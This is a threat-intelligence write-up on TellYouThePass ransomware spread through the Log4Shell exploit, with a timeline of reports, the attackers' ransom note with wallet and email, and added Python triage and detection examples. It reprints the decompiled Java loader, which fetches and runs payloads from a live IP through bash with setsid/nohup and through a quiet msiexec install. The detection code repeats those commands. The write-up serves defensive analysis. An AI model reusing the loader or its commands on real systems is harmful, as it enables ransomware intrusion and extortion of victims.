TellYouThePass ransomware via Log4Shell exploitation

Written by @TrevorGiffen

The Log4j2 exploit Log4Shell is being used to deploy TellYouThePass ransomware, an old and inactive ransomware family; prior to this event, TellYouThePass ransomware had not been mentioned on Twitter since 2020-07-23.

Research has been published in the Chinese-speaking community, but not in the English-speaking community until now. Judging from threat reports, this threat appears to be prominently affecting Chinese victims. We would like to especially highlight that TellYouThePass does not operate as a RaaS (Ransomware-as-a-Service).

2021-12-13:

  • Twitter user @80vul observed that ransomware was deployed on an old system that contained an internet-facing Log4j2 RCE vulnerability; another [now deleted] message was posted, with multiple responses containing references to TellYouThePass.
  • Twitter users @Tork_88 and @cibernicola_es responded with an indication that the ransomware family may have been called "TellYouThePass".
  • Curated Intel member @PolarToffee responded with an ID-Ransomware (IDR) metric showing that on December 13th more than 30 samples of "TellYouThePass" ransomware were submitted to IDR, "a very sudden spike in submissions for what is a very old ransomware [that day]." Toffee further noted that she is "not saying they are using log4j2 but that's certainly interesting."
  • On 2021-12-17, Curated Intel member @PolarToffee provided a follow-up ID-Ransomware (IDR) statistic. In this telemetry, between 2021-12-13 and 2021-12-17, victim geographies submitting ransom notes to IDR included China (20), Hong Kong (2), Japan (2), Taiwan (2), Belarus (1), Thailand (1), and United States (1).

2021-12-14:
  • Sangfor Threat Intelligence Team captured TellYouThePass ransomware samples and conducted an analysis, identifying TellYouThePass ransomware being deployed using the Log4j2 exploit.
    • Through honeypot collections, they identified TellYouThePass ransomware launching "thousands of attacks" against "[OA systems and an open-source project]" that contain Log4j2 vulnerabilities.
    • The group used the CVE-2021-44228 Log4Shell exploit to carry out an attack en masse.
    • The command-and-control server is contacted as a background task.
    • After the exploit executes, the ransomware file is downloaded to the Windows or Linux system and run to encrypt files.
    • Ransom notes are written to files called "README.html".
    • The referenced security blog shares what they claim to be "a large number of TellYouThePass ransomware interception logs."
    • Sangfor reports that "only in the time period from 17:00 to 19:00 on December 12 and 17:00 to 19:00 on December 13, user data in multiple [Chinese] provinces and different industries have been encrypted, and they are all OA systems."
2021-12-16:
  • Curated Intel members @nokae8 and @Myrtus0x0 analyzed a payload delivered to a vulnerable system via the Log4j2 exploit; ransomware was deployed, and based on an analysis of the ransom note they concluded that it likely belongs to the "TellYouThePass" ransomware family.
  • They kindly shared the ransom note and the Java class file via Curated Intel (see below); their contents can be validated against this sample.

Ransom file (README.html):

<html>
<head>
<title>
Recovery your files.
</title>
<style type="text/css">
.main {height:auto; width:100%;word-wrap:break-word}
</style>
</head>
<body>
<font color=#8B0000>
<b>I am so sorry ! All your files have been encryptd by RSA-1024 and AES-256 due to a computer security problems.</b></br>
<b>If you think your data is very important .The only way to decrypt your file is to buy my decrytion tool .</b></br>
<b>else you can delete your encrypted data or reinstall your system.</b></br>
</br>
<h2>Your personid :</h2>
<div class="main">
<b>MbNHLPyB+QAhKcdh2iX1eDVadrJ5j1y25QNqrtYe7MKa8eu9WqOjl84cOJwe71YU92iwpPxroh5fqfa8hui5A96EhC1MUhLUoPE/F8RFVLinwwXVnj+WZ822Fl2LM3Wzkj1g4uEVvghHO4bCGY4ikniEl76Jt/gkEpaPTrDdF/dxXcsmdXiZ+E0i4ssXEosteuEudIVezqLFk7xkjNG+X+h5aBMtMYvXjwnxVgdooBJTrdyswh0GXC8ec/sGk+gJtzev8rz7LwgTlONK8ZzMtrSH0UOLcrJEBfRdHvqwunN38RDjaAUKQV308uiGh8cuXNuqxBU5C0/yEKN23FjOpwmMzFARppQytGcHl6la3dmasb/8boqSgIsuEUO3XQDXjlzG3l3OOIc7oZ0hKMJdXxQ7FJbunw7Bx9b75x0tG9/E41NfLwQ9GV0vkiF4yBuO2FtASAlC1NwLFWBJECIMK1U7KgFTdjaogOATGz3h0o16IzaBhptA9juJ7HGLDI+RBZv7SLgRa9TR0TgOkQo9LERT1LC2WwFm+n4PhtGWn+mvwsQVRMn19z1PZvfF0f/S/DuhpGI4PWMVl0+7gmbycAUrgsatmtXE3+O/ukp6SzIrWJqjQFXk6Q8h3mGS0Oo543vFfzNrt3GyR734SX5bRCXMVWOx5MHcc2euiiZ5ShgLhwF0TVRHR++qoL6iSgstLw11Nfu9FEeY3Oh6FbajUNN7bWVIphWOMNHZLgNjrkq3xSZHLwywmyjENQb2S0PqrI/8QISoHano+m6FuetAPiDmsV+MTjD6pAGMEUMoR71ncEWE3HUHNIF4r7OPtv+myaPgPDgTQRbG6BQ9GdAz4Rzov0/E9PcfOssSocntd6zkeE2wZCAnZU/XZgq+/TdTrDWTbT0ayQuEq5db/mcdUj7Jd25boXxg2L1qP1662tcmBxOoRNGAEgxjkr9FZ5lJ4hxbEQ6hE84xa1M+LPBanqCqN3yWdejTvkT0SVV53/ax1Y5tD61f44ClmQHhIi9ZrerfodnSByAxuy7ICTWzKKWYrU16tNlB0dJk3GBIY5PD38D8YtpVyCyIG9D6QmBA9aM/ikxGoWOqloBpEWSygROXI1wjPT4CI4Y5/tAqeqY9EQ6UkahLP02Jofvof4dA5O2DeryXcLr5jxk3qsMJQVpPkb1fXaL898vMYxwqZXyOtRdJy91cSGW0LrMDMvFKsbK/TsqxqAllIhmNajwO4/Gm+ba1IPBBZX4u2mURFUAt63X2Jnvjhhkk7R/Z2w0bGiDywTqZcHkvu3HZilhuZsm6PCzF0lmwiG5SX4FSTu8BCVAQ0EDZiutybCLQ9knJ2kcYOV0ReF07k2YhN3zoKDDSewxJFzZNznLzrsdYOU4KsAGqp7ruc6Sy88HXZvXgf9vOUdqfML7jnwG751uNW80GOP4oJLJOgekcAJAGfOw8pASXSrkXlM0iqjFhAhio6/92uiN618/zrGK0Rgc7CGf5LXf8cc/Mo3ENM6NKZOxueCVLg8rRSoZR3Ny4JR2NR/4PXO3HWsplbQe1hS69FAt4et1SMdjYowiucMw0vrwn8sn7LEfpecjK5ad8a4wJtGlSRj10qyozr/x9T8P4dWMmbphUnULK2SibY2e8oedQBHuwIoIizgDpMJwXlcU9fmZm9Tooxf7fO/ScMuDClKMow9fpclbsdWYl2LXZVvo=</b></div></br>
</br>
</br>
<h2>Decrytion do as follows:</h2>
<b>1. if you not own bitcoin,you can buy it online on some websites. like https://localbitcoins.net/ or https://www.coinbase.com/  .</b></br>
<b>2. send 0.05 btc to my wallet address 1K25DjGJuqpK3cgKW15WmHXahuvAfUomVU.</b></br>
<b>3. send your btc transfer screenshots and your persionid to my email service@goodluckday.xyz . i will send you decrytion tool.</b></br>
</br>
</br>
<h2>Tips:</h2>
<b>1.don't rename your file </b></br>
<b>2.you can try some software to decrytion . but finally you will kown it's vain . </b></br>
<b>3.if any way can't to contact to me .you can try send me bitcoin and paste your email in the transfer information. i will contact you and send you decrytion tools.</b></br>
</br>
</br>
<b>Anything you want to help . please send mail to my email service@goodluckday.xyz.</b></br>
<b>Have a nice day . </b>
</font>
<body>
</html>
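
Defensive triage of a ransom note, as an added example that is not part of the original post or of Curated Intel's tooling: it extracts the visible text of a README.html, checks for the phrases that identify this family's note, and pulls out the contact email, wallet address and personid blob for IOC matching. The sample note is a constructed excerpt of the one above, with the personid replaced by a placeholder.

```python
import re
from html.parser import HTMLParser

# Constructed excerpt modelled on the README.html shown above; the personid
# blob is replaced by a placeholder so the sample stays readable.
SAMPLE_NOTE = """<html><head><title>
Recovery your files.
</title></head><body><font color=#8B0000>
<b>I am so sorry ! All your files have been encryptd by RSA-1024 and AES-256 due to a computer security problems.</b></br>
<h2>Your personid :</h2>
<div class="main"><b>EXAMPLE_PERSONID_BLOB==</b></div></br>
<b>2. send 0.05 btc to my wallet address 1K25DjGJuqpK3cgKW15WmHXahuvAfUomVU.</b></br>
<b>3. send your btc transfer screenshots and your persionid to my email service@goodluckday.xyz . i will send you decrytion tool.</b></br>
</font><body></html>"""

class _TextExtractor(HTMLParser):
    """Collect the visible text of an HTML document, one chunk per text node."""
    def __init__(self):
        super().__init__()
        self.chunks = []

    def handle_data(self, data):
        text = data.strip()
        if text:
            self.chunks.append(text)

def note_text(html):
    parser = _TextExtractor()
    parser.feed(html)
    return "\n".join(parser.chunks)

BTC_RE = re.compile(r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
# Hallmark phrases of this family's note, taken from the README.html above.
MARKERS = ("Recovery your files.", "encryptd by RSA-1024 and AES-256", "personid")

def triage_note(html):
    """Classify a note and extract the contact/payment indicators it carries."""
    text = note_text(html)
    hits = [m for m in MARKERS if m in text]
    # The personid blob is the text node right after the "Your personid :" heading.
    lines = text.splitlines()
    personid = None
    for i, line in enumerate(lines[:-1]):
        if line.startswith("Your personid"):
            personid = lines[i + 1]
            break
    return {
        "family": "TellYouThePass" if len(hits) == len(MARKERS) else "unknown",
        "markers_matched": hits,
        "emails": sorted(set(EMAIL_RE.findall(text))),
        "btc_addresses": sorted(set(BTC_RE.findall(text))),
        "personid": personid,
    }
```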

Java class file (Down.class.java):

import java.io.BufferedInputStream;
import java.io.BufferedOutputStream;
import java.io.BufferedReader;
import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.URL;

public class Down {
  public Down() {
    String str1 = "http://158.247.216.148:80/";
    String str2 = str1 + "ss64.exe";
    String str3 = str1 + "ss64";
    String str4 = System.getProperty("os.name");
    System.out.println(str4);
    if (str4.toLowerCase().startsWith("linux")) {
      String str = "/tmp/bash";
      saveUrlAs(str3, str);
      ExecLinux("chmod +x " + str + ";setsid " + str);
      ExecLinux("sleep 3");
      ExecLinux("nohup " + str + " &");
    } else if (str4.toLowerCase().startsWith("win")) {
      String str = "C:\\debug.exe";
      ExecWin("msiexec /q /i " + str1 + "ss64.msi");
      ExecWin("pinc -n 2 127.0.0.1");
    } 
    System.out.println("done");
  }
  
  public static void saveUrlAs(String paramString1, String paramString2) {
    File file = new File(paramString2);
    if (file.exists())
      System.out.println("exist " + paramString2); 
    FileOutputStream fileOutputStream = null;
    HttpURLConnection httpURLConnection = null;
    InputStream inputStream = null;
    try {
      URL uRL = new URL(paramString1);
      httpURLConnection = (HttpURLConnection)uRL.openConnection();
      httpURLConnection.setConnectTimeout(20000);
      httpURLConnection.setReadTimeout(60000);
      httpURLConnection.setRequestMethod("GET");
      httpURLConnection.setDoInput(true);
      httpURLConnection.setDoOutput(true);
      httpURLConnection.setUseCaches(false);
      httpURLConnection.connect();
      inputStream = httpURLConnection.getInputStream();
      BufferedInputStream bufferedInputStream = new BufferedInputStream(inputStream);
      fileOutputStream = new FileOutputStream(paramString2);
      BufferedOutputStream bufferedOutputStream = new BufferedOutputStream(fileOutputStream);
      byte[] arrayOfByte = new byte[4096];
      int i = bufferedInputStream.read(arrayOfByte);
      while (i != -1) {
        bufferedOutputStream.write(arrayOfByte, 0, i);
        i = bufferedInputStream.read(arrayOfByte);
      } 
      bufferedOutputStream.close();
      bufferedInputStream.close();
      httpURLConnection.disconnect();
    } catch (Exception exception) {
      exception.printStackTrace();
      System.out.println("down err");
    } 
  }
  
  public static void ExecLinux(String paramString) {
    try {
      System.out.println("this is linux");
      Process process = Runtime.getRuntime().exec(new String[] { "bash", "-c", paramString });
      InputStream inputStream = process.getInputStream();
      BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
      String str;
      while ((str = bufferedReader.readLine()) != null)
        System.out.println(str); 
      process.waitFor();
      inputStream.close();
      bufferedReader.close();
      process.destroy();
    } catch (Exception exception) {
      exception.printStackTrace();
      System.out.println("exec linux err");
    } 
  }
  
  public static void ExecWin(String paramString) {
    try {
      Process process = Runtime.getRuntime().exec(new String[] { "cmd.exe", "/c", paramString });
      InputStream inputStream = process.getInputStream();
      BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
      String str;
      while ((str = bufferedReader.readLine()) != null)
        System.out.println(str); 
      process.waitFor();
      inputStream.close();
      bufferedReader.close();
      process.destroy();
    } catch (Exception exception) {
      exception.printStackTrace();
      System.out.println("exec win err");
    } 
  }
}
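
Detection logic for the loader behaviour visible in Down.class, as an added example that is not part of the original post: each rule mirrors one step of the class (the JVM running the vulnerable Log4j2 application spawning a shell, msiexec quietly installing a package from a URL, a file dropped in /tmp started detached with setsid or nohup) and is run over constructed process-creation events in an assumed EDR-like JSON shape. The hostnames and the event format are assumptions; the C2 address is the one in the class above.

```python
import json
import re

# Constructed process-creation events in a simplified EDR-like JSON shape
# (host, parent, image, cmdline); not real telemetry from any victim.
EVENTS = [
    '{"host":"oa-web01","parent":"/usr/bin/java","image":"/bin/bash",'
    '"cmdline":"bash -c chmod +x /tmp/bash;setsid /tmp/bash"}',
    '{"host":"oa-web01","parent":"/usr/bin/java","image":"/bin/bash",'
    '"cmdline":"bash -c nohup /tmp/bash &"}',
    '{"host":"oa-web02","parent":"C:\\\\jdk\\\\bin\\\\java.exe",'
    '"image":"C:\\\\Windows\\\\System32\\\\cmd.exe",'
    '"cmdline":"cmd.exe /c msiexec /q /i http://158.247.216.148:80/ss64.msi"}',
    '{"host":"build07","parent":"/usr/bin/java","image":"/bin/bash",'
    '"cmdline":"bash -c mvn -q package"}',
    '{"host":"ws15","parent":"C:\\\\Windows\\\\explorer.exe",'
    '"image":"C:\\\\Windows\\\\System32\\\\msiexec.exe",'
    '"cmdline":"msiexec /i C:\\\\installers\\\\app.msi"}',
]

def _basename(path):
    return re.split(r"[\\/]", path)[-1].lower()

# One rule per behaviour of Down.class: shell spawned by the JVM, quiet msiexec
# install from a URL, detached start of a binary under /tmp.
RULES = {
    "java_spawns_shell": lambda e: _basename(e["parent"]) in ("java", "java.exe")
        and _basename(e["image"]) in ("bash", "sh", "cmd.exe"),
    "msiexec_quiet_remote": lambda e: re.search(
        r"msiexec\s+/q\s+/i\s+https?://", e["cmdline"], re.I) is not None,
    "tmp_binary_detached": lambda e: re.search(
        r"\b(setsid|nohup)\s+/tmp/\S+", e["cmdline"]) is not None,
}

def detect(raw_events):
    """Return {host: sorted rule names} for every host that fired at least one rule."""
    hits = {}
    for line in raw_events:
        event = json.loads(line)
        fired = [name for name, rule in RULES.items() if rule(event)]
        if fired:
            hits.setdefault(event["host"], set()).update(fired)
    return {host: sorted(rules) for host, rules in hits.items()}

def likely_loader(raw_events):
    """Hosts where the JVM shell spawn is corroborated by a second loader behaviour."""
    return sorted(host for host, rules in detect(raw_events).items()
                  if "java_spawns_shell" in rules and len(rules) >= 2)

if __name__ == "__main__":
    print(detect(EVENTS))
    print(likely_loader(EVENTS))  # ['oa-web01', 'oa-web02']
```

The build host fires only the shell-spawn rule, which is why the corroborating second behaviour is required before a host is flagged.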

In conclusion, Curated Intel will now track "TellYouThePass Ransomware" in place of the unnamed "New Ransomware" entry previously recorded in our Log4Shell-IOCs GitHub repository for targeting a server running an instance affected by the Log4j2 vulnerability. Using this repository, members of Curated Intel have compiled and validated a list of IOC feeds and threat reports focused on the recent Log4Shell exploitation of CVE-2021-44228 in Log4j.